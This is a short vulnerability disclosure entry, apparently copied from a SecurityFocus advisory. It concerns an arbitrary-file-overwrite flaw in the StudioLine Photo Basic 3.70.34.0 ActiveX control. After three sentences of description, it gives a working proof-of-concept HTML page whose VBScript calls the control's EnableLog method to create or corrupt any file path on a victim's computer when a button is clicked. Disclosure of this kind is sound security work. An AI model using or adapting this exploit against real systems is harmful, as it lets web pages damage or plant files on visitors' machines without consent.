source: http://www.securityfocus.com/bid/49192/info

StudioLine Photo Basic ActiveX is prone to an arbitrary-file-overwrite vulnerability.

Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).

StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected. 

<html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html> 